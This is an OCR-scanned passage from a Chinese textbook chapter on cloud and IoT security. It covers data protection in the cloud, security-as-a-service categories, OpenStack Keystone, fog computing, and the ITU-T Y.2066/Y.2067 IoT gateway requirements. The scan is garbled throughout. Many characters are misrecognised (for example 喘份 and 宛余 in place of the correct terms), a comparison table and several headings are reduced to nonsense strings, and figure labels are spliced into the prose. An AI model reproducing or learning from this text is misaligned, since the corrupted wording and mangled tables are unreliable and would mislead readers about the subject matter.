云 计 算 中 使 用 的 数据 库 环境 可 能 差异 很 大 。 某 些 提供 者 文 持 多 实例 模型 ， 它 为 每 个 云 客户 
提供 在 VM 实例 上 运行 的 唯一 DBMS。 这 使 用 户 可 以 完全 控制 角色 定义 、 用 户 授 权 以 及 其 他 
与 安全 相关 的 管理 任务 。 其 他 提供 者 支持 多 租户 模型 ， 该 模型 通常 通过 标记 具有 用 户 标识 符 的 
数据 来 为 云 客户 提供 与 其 他 租户 共享 的 预定 义 环境 。 标 记 给 出 了 实例 专用 的 外 观 , 但 要 依赖 云 
供应 商 来 建立 和 维护 一 个 安全 的 数据 库 环境 。 
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数据 必须 在 静态 、 传 输 和 使 用 时 得 到 保护 ， 并 且 必 须 控制 对 数据 的 访问 。 客 户 端 可 以 使 用 
加 密 来 保护 传输 中 的 数据 ， 尽 管 这 涉及 CSP 的 密 钥 管理 职责 。 客 户 端 可 以 强制 执行 访问 控制 
技术 ,但 是 CSP 在 某 种 程度 上 又 取决 于 所 使 用 的 服务 模型 。 

对 于 静态 数据 ， 理 想 的 安全 措施 是 让 客户 端 加 密 数 据 ， 并 仅 将 加 密 数 据 存储 在 云 中 ， 而 
CSP 无 法 访问 加 密 密 钥 。 只 要 密 钥 安全 ，CSP 就 无 法 破译 数据 ， 尽 管 仍 然 有 数据 损坏 和 其 他 拒 
绝 服务 攻击 的 风险 。 当 数据 存储 在 云 中 时 ， 可 以 使 用 图 5-9 中 描述 的 模型 。 

13.3.3 ” 云 计 算 资产 的 安全 方法 

除了 保护 和 隔离 数据 之 外 ， 云 服务 提供 者 ( Cloud Service Provider, CSP) 需要 解决 危害 其 
资产 保护 的 更 广泛 的 安全 问题 。 图 13-5a 改编 自 [ENIS15]， 建 议 对 这 三 种 云 服务 模型 进行 资产 
分 类 。 图 中 显示 的 底部 两 层 包 括 组 织 和 设施 。 组 织 表 示人 力 资 源 以 及 维护 设施 和 支持 服务 交付 
的 政策 和 程序 。 设 施 表示 物理 结构 和 供应 ， 如 网 络 、 制 冷 和 电力 。 这 些 层 次 之 上 是 提供 服务 的 
特定 资产 。 对 于 laas, CS 在 其 每 台 服 务 器 上 维护 一 个 管理 程序 或 操作 系统 ， 以 及 用 于 CSP 
服务 器 互联 和 连接 到 云 服务 客户 (Cloud Service Consumer, CSC) 的 网 络 软件 。Paas 的 资产 中 
增加 了 用 于 支持 CSC 应 用 程序 的 库 、 中 间 件 和 其 他 软件 。 对 于 SaaS, CSP 还 具有 CSC 使 用 的 
应 用 软件 资产 。 

图 13-5b 提出 了 由 CSP Al CSC 负责 的 关键 安全 任务 。 图 的 底层 与 组 织 问题 有 关 ， 而 这 
些 问题 则 与 其 对 供应 和 设施 的 管理 有 关 。 这 些 问题 将 在 第 14 章 、 第 15 章 和 第 17 章 中 讨 
论 。 图 13-5b 的 下 一 层 涵盖 了 设施 的 物理 安全 性 ， 这 是 第 16 章 中 讨论 的 主题 。 在 此 之 上 ， 
根据 服务 模型 ，CSP 负责 一 系列 软件 功能 的 安全 性 ， 第 11 间 和 第 12 章 介 绍 了 该 领域 的 安 
全 措施 。 
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图 13-5 云 计算 资产 的 安全 注意 事项 


13.3.4 ” 云 安全 即 服 务 


安全 即 服 务 指 的 是 由 服务 提供 者 提供 的 一 系列 安全 服务 ， 这 些 服务 使 得 安全 服务 提供 者 分 
担 了 企业 承担 的 大 部 分 安全 职责 。 服 务 一 般 包 括 认 证 、 病 毒 防范 、 恶 意 软件 / 间谍 软件 防范 、 
入 侵 检 测 以 及 安全 事件 管理 。 在 云 计算 的 背景 下 ， 云 安全 即 服 务 (表示 为 SecaaS) 是 CSP 提供 
的 SaaS 的 一 部 分 。 
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CSA 将 SecaaS 定义 为 通过 云 提供 的 安全 应 用 程序 和 服务 ， 既 可 以 交付 给 基于 云 的 基础 设 
施 和 软件 ， 也 可 以 由 云 交 付 给 用 户 本 地 系统 [CSA11]。CSA 定义 了 如 下 的 SecaaS 分 类 : 
e 身份 和 访问 管理 
Web 安全 
电子 邮件 安全 
安全 评估 
和信 侵 管理 
安全 信息 与 事件 管理 
加 密 
业务 连续 性 与 灾难 恢复 
© 了 网络 安全 
在 本 节 中 ， 我 们 着 重 从 基于 云 的 基础 设施 和 服务 安全 的 角度 研究 这 些 分 类 (如 图 13-6 
所 示 )。 





安全 信息 与 事件 管理 
业务 连续 性 与 灾难 恢复 










区 身份 和 访问 管理 
sas 网 络 安全 
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云 服 务 客户 端 与 敌手 
图 13-6 云 安 全 即 服务 的 要 素 


身份 和 访问 管理 (Identity and Access Management, IAM) 包括 用 于 管理 企业 资源 访问 的 人 

力 、 进 程 和 系统 ， 它 确保 访问 实体 的 喘 份 都 经 过 验证 ， 并 授予 该 实体 相应 的 访问 权限 。 和 号 份 管 

理 的 一 个 方面 是 身份 配置 ， 当 客户 端 企 业 指 定 一 些 用 户 不 能 再 访问 云 中 的 企业 资源 时 ， 身 份 配 

置 与 提供 对 已 识别 用 户 的 访问 以 及 随后 取消 配置 或 拒绝 访问 有 关 。 喘 份 管理 的 其 他 要 求 是 云 服 
务 提供 者 必须 能 够 与 企业 选 定 的 映 份 提供 者 交换 身份 属性 。 





TAM 的 访问 管理 部 分 涉及 认证 和 访问 控制 服务 。 例 如 ，CSP 必须 采用 一 种 充分 可 信 的 方 
式 认证 用 户 。 在 SPI 环境 中 ， 访 问 控制 需求 包括 : 建立 可 信 的 用 户 档 案 和 策略 信息 ， 使 用 可 信 
的 用 户 档 案 和 策略 信息 进行 云 服 务 中 的 访问 控制 ， 以 及 以 可 审计 的 方式 执行 这 些 流 程 。 

数据 损失 防范 (Data Loss Prevention, DLP) 是 在 静态 、 传 输 和 使 用 时 对 数据 进行 监控 、 保 
护 和 验证 其 安全 性 。 大 部 分 DLP 都 可 以 由 云 客 户 端 实施 ， 例 如 本 节 前 面部 分 讨论 的 内 容 ( 云 
中 的 数据 保护 )。CSP 同样 可 以 提供 DLP 服务 ， 例 如 在 不 同 场景 中 基于 数据 的 相应 功能 的 实现 
规则 。 

Web 安全 是 实时 保护 ， 可 以 自行 通过 软件 /设备 安装 提供 ， 也 可 以 在 云 上 通过 代理 或 重 
定向 Web 流量 到 CSP 来 提供 。 这 为 诸如 防 病毒 软件 之 类 的 事物 提供 了 额外 的 保护 层 ， 以 防止 
恶意 软件 通过 Web 浏览 等 活动 进入 企业 。 除 了 防范 亚 意 软件 外 ， 基 于 云 的 Web 安全 服务 还 可 
能 包括 使 用 策略 实施 、 数 据 备份 、 流 量 控制 和 Web 访问 控制 等 。 

CSP 可 以 在 需要 安全 措施 的 情况 下 提供 基于 Web 的 电子 邮件 服务 。 电 子 邮 件 安全 功能 可 
控制 人 站 和 出 站 电子 邮件 ， 防 止 组 织 受 到 网 络 钓鱼 、 恶 意 附件 和 执行 公司 策略 (如 可 接受 使 用 
策略 和 垃圾 邮件 防范 策略 ) 的 影响 。CSP 还 可 以 在 所 有 电子 邮件 客户 端 上 合并 数字 签名 并 提供 
对 电子 邮件 加 密 的 可 选项 。 

安全 评估 是 第 三 方 对 云 服 务 的 审计 。 当 该 服务 超出 CSP 的 职责 范围 时 ，CSP 可 以 提供 工 
具 和 接 入 点 以 便 各 种 评估 活动 的 实施 。 

入 侵 管 理 包括 入 侵 检 测 、 防 御 和 响应 。 该 服务 的 核心 是 在 云 接 入 点 和 云 服务 器 上 实现 入 侵 
检测 系统 (Intrusion Detection System, IDS) MAMAA (Intrusion Prevention System, IPS). 
IDS 是 一 系列 自动 检测 工具 ， 用 于 检测 对 主机 系统 进行 的 未 授权 访问 。IPS 包含 IDS 的 功能 ， 
并 具有 阻 断 人 侵 者 的 通信 流量 的 机 制 。 

安全 信息 与 事件 管理 ( Security Information and Event Management, SIEM) 从 虚拟 或 现实 的 
网 络 、 应 用 和 系统 中 统计 (利用 压 栈 和 弹 栈 机 制 ) 日 志和 事件 数据 。 这 些 统计 要 素 会 被 关联 起 
来 进行 分 析 ， 用 于 可 能 需要 干预 或 其 他 类 型 响应 的 信息 /事件 ， 以 提供 实时 报告 和 警报 。CSP 
一 般 会 将 云 和 企业 客户 网 络 中 的 信息 汇总 起 来 ， 以 提供 综合 的 服务 。 

加 密 是 一 种 很 普遍 的 服务 方式 ， 常 被 用 于 云端 静态 数据 、 电 子 邮件 流量 、 客 户 端 特定 的 网 
络 管理 信息 以 及 身份 信息 等 。 由 CSP 提供 的 加 密 服 务 会 涉及 一 些 问 题 ， 包 括 密 钥 管理 、 如 何 
在 云 中 实现 虚拟 专用 网 络 ( Virtual Private Network, VPN) 服务 、 应 用 程序 加 密 以 及 数据 内 容 访 
问 等 。 

业务 连续 性 与 灾难 恢复 包括 一 些 措施 和 机 制 ， 它 们 确保 了 服务 中 断 时 的 操作 可 恢复 性 。 鉴 
于 经 济 因素 ，CSP 可 以 为 云 服务 客户 带 来 明显 的 优势 。 利 用 可 靠 的 故障 和 灾难 恢复 设备 ，CSP 
可 以 在 多 处 提供 备份 。 该 服务 必须 包括 灵活 的 基础 设施 、 宛 余 的 功能 和 硬件 、 监 管 操 作 、 地 理 
位 置 上 的 分 布 式 数据 中 心 以 及 具有 较 强 生存 能 力 的 网 络 等 内 容 。 

网 络 安 全 包括 配置 访问 、 分 配 、 监 管 以 及 保护 底层 资源 服务 等 安全 服务 。 服 务 包括 对 网 络 
边界 、 服 务 器 防火 墙 以 及 拒绝 服务 攻击 的 防护 。 本 节 列 出 的 许多 其 他 服务 ， 包 括 人 侵 管 理 、 喘 
份 和 访问 管理 、 数 据 损 失 防 范 以 及 Web 安全 ， 也 对 网 络 安全 服务 做 出 了 贡献 。 


13.3.5 “一 个 开源 的 云 安全 模块 


本 小 节 概 述 OpenStack 云 操作 系统 的 开源 安全 模块 。OpenStack 是 OpenStack Foundation 
的 一 个 开源 软件 项 目 ，OpenStack Foundation 旨 在 开发 一 个 开源 的 云 操作 系统 [ROSA14， 
SEFR12]。 其 主要 目标 是 在 云 计算 环境 中 创建 和 管理 大 量 虚 拟 专用 服务 器 。 OpenStack 以 某 种 
Fi REA BI Cisco (思科 )、IBM、 惠 普 和 其 他 提供 者 提供 的 数据 中 心 基础 设施 和 云 计算 产 


314 多 二 部 分 KHPA 


品 之 中 。 它 提供 了 多 租户 laaS， 则 在 通过 简单 实施 和 大 规模 扩展 来 满足 公有 云 和 私有 云 的 需 
求 ， 而 无 论 规模 如 何 。 
OpenStack OS 包含 许多 独立 的 模块 ， 每 个 模块 都 有 一 个 项 目 名 称 和 一 个 功能 名 称 。 模 块 
化 结构 易于 扩展 ， 并 可 以 提供 一 套 常 用 的 核心 服务 。 通 常 ， 这 些 组 件 一 起 配置 以 提供 全 面 的 
IaaS 功能 。 然 而 ， 模 块 化 设计 使 得 这 些 组 件 通 常 也 能 够 独立 使 用 。 
OpenStack 的 安全 模块 是 Keystone。Keystone 为 正常 运行 的 云 计 算 基础 设施 提供 了 必 不 可 
少 的 共享 安全 服务 。 它 提供 以 下 主要 服务 : 
e 身份 : 身份 是 用 户 信 息 认 证 。 这 一 信息 定义 了 用 户 在 项 目 中 的 角色 和 权限 ， 而 且 是 基 
于 角色 的 访问 控制 (Role-Based Access Control, RBAC) 机 制 的 基础 。Keystone 支持 
多 种 身份 验证 方法 ， 包 括 用 户 名 和 口令 、 轻 量 级 目录 访问 协议 (Lightweight Directory 
Access Protocol, LDAP) 以 及 配置 CSC 提供 的 外 部 身份 验证 方法 的 方式 。 
e 令 牌 : 认证 后 ， 令 牌 被 分 配 并 用 于 访问 控制 。OpenStack 服务 保留 令 牌 并 在 操作 期 间 使 
用 它们 来 查询 Keystone。 

e 服务 目录 : 用 Keystone 注册 OpenStack 服务 端点 以 创建 服务 目录 。 服 务 的 客户 端 连接 
到 Keystone， 并 根据 返回 的 目录 确定 要 调用 的 端点 。 

e 策略 : 该 服务 实施 不 同 的 用 户 访问 级 别 。 每 个 OpenStack 服务 在 关联 的 策略 文件 中 为 
其 资源 定义 访问 策略 。 以 API 访问 为 例 ， 可 以 是 访问 到 卷 ， 或 者 是 到 启动 实例 。 云 管 
理 员 可 以 修改 或 更 新 这 些 策略 ， 以 控制 对 各 种 资源 的 访问 。 

图 13-7 说 明了 Keystone 与 其 他 OpenStack 组 件 交 互 以 启动 一 个 新 VM 的 方式 。Nova 是 
控制 laas 云 计 算 平 台 内 虚拟 机 的 管理 软件 模块 。 它 管理 着 OpenStack 环境 中 计算 实例 的 整个 
生命 周期 ， 职 责 包 括 按 需 生 产 、 安 排 和 淘汰 机 器 。 因 此 ，Nova 使 企业 和 服务 提供 者 能 够 通过 
配置 和 管理 大 型 虚拟 机 网 络 来 提供 按 需 计算 资源 。Glance 是 VM 磁盘 映像 的 查找 和 检索 系统 。 
它 提 供 了 通过 API 发 现 、 注 册 和 检索 虚拟 映像 的 服务 。Swift 是 一 个 分 布 式 对 象 存储 ， 可 创建 
多 达 数 PB 的 元 余 和 可 扩展 存储 空间 。 对 象 存储 不 提供 传统 文件 系统 ， 而 是 用 于 静态 数据 的 分 
布 式 存储 系统 ， 例 如 虚拟 机 映像 、 照 片 存储 、 电 子 邮 件 存储 、 备 份 和 归档 等 。 
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图 13-7 在 OpenStack 中 启动 虚拟 机 
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物 联网 是 在 计算 和 通信 技术 长 期 持续 变革 中 形成 的 最 新 发 展 成 果 。 从 规模 大 小 、 普 遍 存 在 
性 以 及 对 日 党 生活、 商业 和 政府 的 影响 来 说 ， 这 次 的 技术 进步 非常 显 着 。 本 市 简要 概述 物 联网 。 


13.4.1 物 联 网 上 的 事物 


物 联 网 (Internet of Things, IoT) 是 一 个 术语 ， 指 的 是 智能 设备 之 间 的 互联 互通 ， 涉 及 范 
围 从 设备 到 微型 传感器 。 一 个 重要 课题 是 将 短程 移动 收发 器 能 人 到 各 种 小 工具 和 日 常 物品 中 ， 
实现 人 与 物 之 间 以 及 物 与 物 之 间 的 新 型 通信 。Internet 现在 通常 通过 云 系统 支持 数 十 亿 工 业 物 
体 和 个 人 物体 的 互联 。 这 些 物体 提供 传感器 信息 ， 根 据 环境 采取 行动 ， 并 在 某 些 情况 下 上 自行 修 
改 ， 以 创建 更 大 系统 的 整体 管理 ， 如 工厂 或 城市 。 

物 联网 主要 由 深度 做 人 式 设备 驱动 。 这 些 设备 是 低 带 宽 、 低 重复 率 数 据 采 集 和 低 带 宽 数 
据 使 用 设备 ， 它 们 相互 通信 并 通过 用 户 界 面 提供 数据 。 舱 人 式 设 备 (如 高 分 辩 率 视频 安全 摄像 
头 、 视 频 VoIP 电话 和 少数 其 他 设备 ) 需要 高 带宽 流 媒体 功能 。 然 而 ， 大 部 分 产品 只 需要 间 和 软 
性 地 传送 数据 包 。 


13.4.2 演化 


对 于 终端 系统 支持 的 参考 架构 ，Internet 经 历 了 大 约 四 代 的 部 署 ， 最 终 实 现 了 IoT: 

1. 信息 技术 : 个 人 电脑 (PC)、 服 务 器 、 路 由 器 、 防 火 墙 等 ， 由 企业 IT 人 员 当 作 IT i 
购买 ， 主 要 通过 有 线 方式 连接 。 

2. 操作 技术 (OT): 由 非 IT 公司 构建 的 具有 骸 人 式 IT 的 机 器 /设备 ， 如 医疗 需 械 、 监 控 
和 数据 采集 (Supervisory Control And Data Acquisition，SCADA)、 过 程控 制 以 及 由 企业 OT 人 
员 购 买 的 作为 设备 使 用 的 有 线 连 接 的 公共 查询 机 (kiosks)。 

3. 个 人 技术 : 消费 者 (员工) 购买 的 作为 IT 设备 的 智能 手机 、 平 板 电脑 和 电子 书 阅读 回 ， 
专门 使 用 无 线 连 接 并 且 通 稼 是 多 种 形式 的 无 线 连接 。 

4. 传感器 / 执行 器 技术 : 消费 者 、IT 和 OT 用 户 购 买 的 单一 用 途 设备 ,通常 采用 单一 形式 
的 无 线 连 接 作 为 大 型 系统 的 一 部 分 。 

通常 认为 第 四 代 Internet 就 是 IoT， 其 标志 是 使 用 数 十 亿 的 藤 入 式 设备 。 


13.4.3” 物 联 化 事物 的 组 件 


物 联 化 设备 的 关键 组 件 如 下 (如 图 13-8 所 示 ): IoT 设 备 
o 传感器 : 传感器 测量 物理 、 化 学 或 生物 实体 的 某 | | | 
些 参数 ， 并 以 模拟 电压 或 数字 信和 号 的 形式 传送 与 观 
测 特性 成 比例 的 电子 信号 。 在 这 两 种 情况 下 ， 传 感 
右 输 出 通常 被 输入 到 微 控制 右 或 其 他 管理 元 件 。 
o 执行 器 : 执行 右 接 收 来 自控 制 器 的 电子 信号 ， 并 
通过 与 其 环境 交互 而 做 出 响应 ， 以 对 物理 、 化 学 

或 生物 实体 的 某 些 参数 产生 影响 。 

微 控 制 器 : HAA PNY “Ae” PRE ASE 

微 控 制 句 提供 。 

e 收发 器 : 收发 器 包含 发 送 和 接收 数据 所 需 的 电子 
器 件 。 大 多 数 IoT 设备 包含 无 线 收 发 右 ， 能 够 使 
用 Wi-Fi、ZigBee 或 其 他 无 线 方案 进行 通信 。 图 13-8 IoT 组 件 
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e 射频 识别 (Radio-frequency Identification, RFID): 使 用 无 线 电波 识别 物品 的 技术 RFID, 
正 日 益 成 为 物 联网 的 支撑 技术 。RFID 系统 的 主要 元 素 是 标签 和 阅读 器 。RFID 标签 是 
用 于 物体 、 动 物 和 人 体 跟 踪 的 小 型 可 编程 设备 。 它 们 具有 不 同 的 形状 、 大 小 、 功 能 和 
WAS. RFID Piette BOF (有 时 ) 重 写 存储 在 操作 范围 内 〈( 几 英寸 到 几 英尺 ) 的 RFID 
标签 上 的 信息 。 阅 读 器 通常 连接 到 计算 机 系统 ， 这 些 系 统 记 录 和 格式 化 获取 的 信息 以 
供 进一步 使 用 。 


13.4.4 物 联 网 和 云 环 境 

为 了 更 好 地 理解 IoT 的 功能 ， 可 以 在 包含 第 三 方 网 络 和 云 计 算 元 素 的 完整 企业 网 络 环境 中 
考察 它 。 图 13-9 提供 了 一 个 概览 图 。 

边缘 ”典型 企业 网 络 的 边缘 是 一 个 支持 IoT 设 备 的 网 络 ， 包 括 传感器 ,也 可 能 包含 执行 
髓 。 这 些 设备 可 以 相互 通信 。 例 如 ， 一 组 传感器 可 能 会 将 其 数据 全 部 传输 到 一 个 传感器 ， 这 些 
传感器 汇聚 了 由 更 高 级 别 实体 收集 的 数据 。 在 这 个 层面 上 ， 也 可 能 有 一 些 网 关 。 网 关 将 IoT ik 
备 与 更 高 级 别 的 通信 网 络 连接 起 来 。 它 在 通信 网 络 使 用 的 协议 和 设备 使 用 的 协议 之 间 执 行 必要 
的 转换 。 网 关 也 可 以 执行 基本 的 数据 聚合 功能 。 








图 13-9 物 联 网 和 云 环 境 


雾 ” 在 许多 物 联 网 部 署 中 ， 大 量 数据 可 能 由 分 布 式 传 感 融 网络 生成 。 例 如 ,海上 油田 和 炼 
油 三 每 天 可 以 产生 ITB 的 数据 。 一 架 飞 机 每 小 时 可 以 创建 数 TB 的 数据 。 不 同 于 将 所 有 这 些 数 
据 永 久 (或 至 少 很 长 一 段 时 间 ) 存储 在 IoT 应 用 程序 可 访问 的 中 央 存 储 内 ， 人 们 通常 更 希望 尽 
可 能 靠近 传感器 以 执行 尽 可 能 多 的 数据 处 理 。 因 此 ， 有 时 被 称 为 边缘 计算 级 别 的 目的 是 将 网 络 
数据 流转 换 为 适合 存储 和 进行 更 高 级 别处 理 的 信息 。 处 理 这 些 级 别 的 元 素 可 能 会 处 理 大 量 的 数 
据 并 执行 数据 转换 操作 ， 从 而 导致 存储 的 数据 量变 少 。 以 下 是 雾 计算 操作 的 示例 : 


评估 : 评估 数据 是 否 应 该 在 更 高 级 别处 理 的 标准 。 

格式 化 : 重新 格式 化 数据 以 获得 一 致 的 更 高 级 别 的 处 理 。 

扩展 / 解码 : 使 用 附加 上 下 文 (如 原点 ) 处 理 隐 藏 数据 。 

净化 /简化 : 简化 或 提炼 数据 ， 以 降低 数据 和 流量 对 网 络 和 更 高 级 别处 理 系 统 的 
影响 。 

评定 : 确定 数据 是 否 代 表 阅 值 或 警报 ， 这 可 能 包括 将 数据 重 定 同 到 其 他 目的 地 。 

一 般 来 说 ， 雾 计算 设备 被 部 署 于 IoT 网 络 边缘 的 物理 地 址 附近 ， 即 靠近 传感器 和 其 他 数据 
生成 设备 。 因 此 ， 大 量 生成 数据 的 一 些 基 本 处 理工 作 被 卸载 ， 并 被 置 于 网 络 中 心 的 IoT 应 用 软 
件 外 包 出 去 。 

雾 计算 和 和 雾 服 务 正在 成 为 IoT 的 一 个 显著 特征 。 雾 计算 代表 了 现代 网 络 与 云 计算 相反 的 趋 
势 。 借 助 云 计算 ,分 布 式 客户 可 以 通过 云 网 络 设施 向 相对 较 少 的 用 户 提 供 大 量 集中 的 存储 和 处 
理 资源 。 通 过 雾 计 算 ， 大 量 个 别 智能 对 象 与 雾 网 络 设施 互联 ， 从 而 提供 接近 物 联网 边缘 设备 的 
处 理 和 存储 资源 。 雾 计算 解决 了 由 成 千 上 万 智能 设备 的 行为 带 来 的 挑战 ， 包 括 安全 性 、 隐 私 
性 、 网 络 容 量 限 制 和 延迟 要 求 等 。" 雾 计算 ”这 个 术语 源 于 这 样 一 个 事实 ， 即 雾 往往 在 地 面 低 
处 徘徊 ， 而 云 在 天 空 高 处 飘荡 。 

核心 ”核心 网 络 也 称 为 骨干 网 络 ， 连 接地 理 上 分 散 的 雾 网 络 ， 并 对 企业 网 络 之 外 的 其 他 
网 络 提 供 访 问 。 通 和 常 ， 核 心 网 络 使 用 超 高 性 能 的 路 由 右 、 高 容量 传输 线路 和 多 个 互联 的 路 由 器 
以 增加 宛 余 和 容量 。 核 心 网 络 还 可 以 连接 到 高 性 能 、 高 容量 的 服务 器 ， 如 大 型 数据 库 服务 器 和 
私有 云 设施 。 一 些 核心 路 由 器 可 能 是 纯粹 在 内 部 提供 元 余 和 额外 的 容量 ， 而 不 用 作为 边缘 路 
Ff. 

云 ” 云 网 络 为 来 自 边 缘 IoT 设备 的 大 量 聚 合 数据 提供 存储 和 处 理 功 能 。 云 服务 器 上 的 应 用 
程序 负责 : (1) 与 IoT 设备 交互 并 管理 IoT 设备 ; (2) 分 析 IoT 生成 的 数据 。 表 13-4 对 云 计 
算 和 雾 计 算 的 特征 进行 了 比较 。 


R 13-4 AMEE LR 


z 
处 理 ee 边缘 
支持 移动 性 不 适用 是 
控制 分 布 式 /分 层 (部 分 控制 ) 
服务 访问 在 边缘 /手持 设备 上 
可 用 性 高 易 失 性 /高 宛 余 性 
用 户 /设备 的 数量 数 百 亿 
主要 内 容 生成 器 设备 /传感器 
AER Ee 
ET i 
软件 虚拟 基础 设施 用 户 设备 

13.5 lol 安全 


IoT 也 许 是 网 络 安全 中 最 复杂 且 发 展 最 缓慢 的 领域 ， 对 这 点 的 阐述 请 参见 图 13-10, CE 
示 了 IoT 安全 涉及 的 主要 元 素 。 网 络 的 中 心 是 应 用 平台 、 数 据 存储 服务 器 以 及 网 络 和 安全 管理 
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系统 。 这 些 中 央 系 统 从 传 感 需 收集 数据 ， 回 执行 器 发 送 控制 信号 ， 并 负责 管理 oT 设备 及 其 通 
信 网 络 。 网 络 边缘 是 支持 IoT 的 设备 ， 其 中 一 些 设备 是 非常 简单 的 受 限 设备 ， 还 有 一 些 设备 是 
更 智能 的 不 受 限 设备 。 此 外 ， 网 关 可 以 代表 IoT 设备 执行 协议 转换 和 其 他 网 络 服务 。 

图 13-10 说 明了 一 些 典 型 的 互联 情况 © 会 
和 包含 安全 功能 的 场景 。 图 13-10 中 的 阴影 i es CN 










表示 至 少 支持 其 中 一 些 功能 的 系统 。 通 常 ， O 
网 关 用 来 实现 安全 功能 ， 如 TLS 和 IPsec, 

不 受 限 设备 可 能 会 (也 可 能 不 会 ) 实现 某 CS) 
种 安全 功能 。 受 限 设备 通常 不 具有 或 具有 

有 限 的 安全 功能 。 网 关 设 备 可 以 提供 网 关 

与 中 心 设备 之 间 的 安全 通信 ， 如 应 用 平台 

和 管理 平台 。 然 而 ， 连 接 到 网 关 的 任何 受 (c) 

限 设备 或 不 受 限 设备 都 在 网 关 与 中 央 系 统 

之 间 建 立 的 安全 区 域 之 外 。 不 受 限 设备 可 (CJ ©) 






(u) 





以 直接 与 中 心 通信 并 支持 安全 功能 。 但 是 ， 应 用 程序 ， 
不 受 限 设 备 
未 连接 到 网 关 的 受 限 设备 与 中 央 设 备 之 间 /\ cy ©) 
没有 安全 通信 。 Q ai O 受 限 设备 
13.5.1 修补 漏洞 阴影 表示 包含 安全 特征 
在 一 篇 经 常 被 引用 的 2014 年 发 表 的 文 图 13-10 TE: EATR 


章 中 ， 安 全 专家 Bruce Schneier 表示 ， 我 们 正 处 于 租 入 式 系统 (包括 IoT 设备 ) 面临 安全 性 危 
机 的 时 刻 [SCHN14]。 般 入 式 设备 充满 了 漏洞 ， 没 有 好 的 方法 来 修补 它们 。 芯 片 制造 商 有 强烈 
的 动机 来 尽 可 能 快速 和 便宜 地 生产 固件 和 软件 产品 。 设 备 制 造 商 根据 价格 和 功能 选择 芯片 ， 很 
少 处 理 芯 片 软 件 和 固件 。 它 们 的 重点 是 设备 本 身 的 功能 。 终 端 用 户 可 能 没有 办 法 修补 系统 ， 或 
者 说 如 果 是 这 样 ， 也 几乎 没有 关于 何 时 以 及 如 何 修补 的 信息 。 其 结果 是 IoT 中 数 以 亿 计 的 联网 
设备 容易 受到 攻击 。 这 当然 是 传感器 的 问题 ， 它 允许 攻击 者 将 错误 数据 插入 网络。 这 对 执行 器 
来 说 可 能 是 一 个 严重 的 威胁 ， 攻 击 者 可 能 会 影响 机 器 和 其 他 设备 的 运行 。 


13.5.2 lol 安全 及 ITU-T 定义 的 隐私 要 求 


ITU-T Y.2066 建议 书 ( 物 联网 的 通用 需求 ，2014 年 6 月 ) 包括 IoT 安全 要 求 的 列表 。 此 列 
表 是 理解 IoT 部 署 所 需 的 安全 实施 范围 的 有 用 基准 。 这 些 要 求 被 定义 为 捕获 、 存 储 、 传 输 、 聚 
合 和 处 理事 物 数据 以 及 提供 涉及 事物 的 服务 时 的 功能 要 求 。 这 些 要 求 与 所 有 IoT 参与 者 有 关 。 
要 求 如 下 : 
e 通信 安全 : 需要 安全 、 可 信和 隐私 保护 的 通信 功能 ， 因 此 可 以 禁止 对 数据 内 容 的 未 经 
授权 的 访问 ， 数 据 的 完整 性 可 以 得 到 保证 ， 并 且 在 IoT 中 传输 或 转换 数据 时 ， 可 以 保 
护 与 隐私 相关 的 数据 内 容 。 
e 数据 管理 安全 : 需要 安全 、 可 信和 隐私 保护 的 数据 管理 功能 ， 因 此 可 以 禁止 未 经 授权 
访问 数据 内 容 ， 保 证 数据 的 完整 性 ， 并 且 在 IoT 中 存储 或 处 理 数 据 时 ， 可 以 保护 与 隐 
私 相关 的 数据 内 容 。 
e 服务 提供 安全 : 需要 安全 、 可 信和 隐私 保护 的 服务 提供 功能 ， 因 此 可 以 禁止 未 经 授权 
的 服务 访问 和 欺骗 性 服务 提供 ， 并 且 可 以 保护 与 IoT 用 户 相 关 的 隐私 信息 。 
e 安全 策略 和 技术 的 整合 : 需要 集成 不 同安 全 策略 和 技术 的 能 力 ， 以 确保 对 IoT 中 各 种 


在 IoT 部 署 中 提供 安全 性 的 关键 组 件 是 网 关 。 企业 网 
ITU-T Y.2067 建议 书 ( 物 联 网 应 用 网 关 的 通用 需求 和 功 
能 ，2014 年 6 月 ) 详 述 了 网 关 应 实施 的 特定 安全 功能 ， 
其 中 一 些 功能 如 图 13-11 所 示 。 包 括 以 下 内 容 : 


© 文 持 与 应 用 程序 的 相互 认证 。 
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设备 和 用 户 网 络 的 一 致 安全 控制 。 
相互 验证 和 授权 : 在 设备 (或 IoT 用 户 ) 可 以 访问 IoT 之 前 ， 需 要 根据 事先 定义 的 安全 
策略 来 进行 设备 (或 IoT AF) 与 IoT 之 间 的 相 
互 验证 和 授权 。 应 用 平 合 
安全 审计 : IoT 需要 支持 安全 审计 。 根 据 适 当 的 
法 规 和 法 律 ， 任 何 数据 访问 或 访问 oT 应 用 的 
企图 都 需要 是 完全 透明 的 ， 并且 可 追溯 和 可 重 
现 。 特 别 是 IoT 需要 支持 数据 传输 、 存 储 、 处 ile 
理 和 应 用 程序 访问 的 安全 审计 。 Intemnet 或 T 


支持 对 连接 设备 的 每 次 访问 进行 识别 。 网 关 
支持 设备 身份 认证 。 根 据 应 用 程序 要 求 和 设备 
功能 ， 它 需要 支持 与 设备 进行 相互 或 单 向 认证 。 
使 用 单 向 身份 认证 ， 设 备 可 以 向 网 关 进行 自我 
认证 ,或 者 网 关 向 设备 进行 自我 认证 , 但 不 能 ga 
同时 认证 两 者 。 


© 文 持 存储 在 设备 和 网 关中 、 网 关 和 设备 之 间 图 13-11 IoT 网 关 安 全 功能 


传输 或 网 关 和 应 用 程序 之 间 传 输 的 数据 的 安全 性 。 根 据 安全 级 别 支持 这 些 数据 的 安 
全 性 。 

文 持 设备 和 网 关 的 隐私 保护 机 制 。 

支持 自我 诊断 和 目 我 修复 以 及 远程 维护 。 

文 持 固 件 和 软件 的 更 新 。 

支持 应 用 程序 自动 配置 或 应 用 程序 配置 。 网 关 需 要 支持 多 种 配置 模式 ， 如 远程 和 本 地 
配置 、 自 动 和 手动 配置 以 及 基于 策略 的 动态 配置 。 


当 涉 及 为 受 限 设备 提供 安全 服务 时 ， 其 中 一 些 要 求 可 能 难以 实现 。 例 如 ， 网 关 应 该 支持 存 
储 在 设备 中 的 数据 的 安全 性 。 如 果 没 有 受 限 设备 的 加 密 功 能 ， 那 么 达到 该 项 要 求 是 不 现实 的 。 

请 注意 ，Y.2067 要 求 提供 了 许多 对 隐私 要 求 的 参考 。 在 家 庭 、 零 售 店 、 车 辆 和 人 类 中 三 泛 
部 署 IoT 事物 的 情况 下 ， 隐 私 正 日 益 受 到 人 们 的 关注 。 随 着 更 多 事物 的 互联 ， 政 府 和 私营 企业 
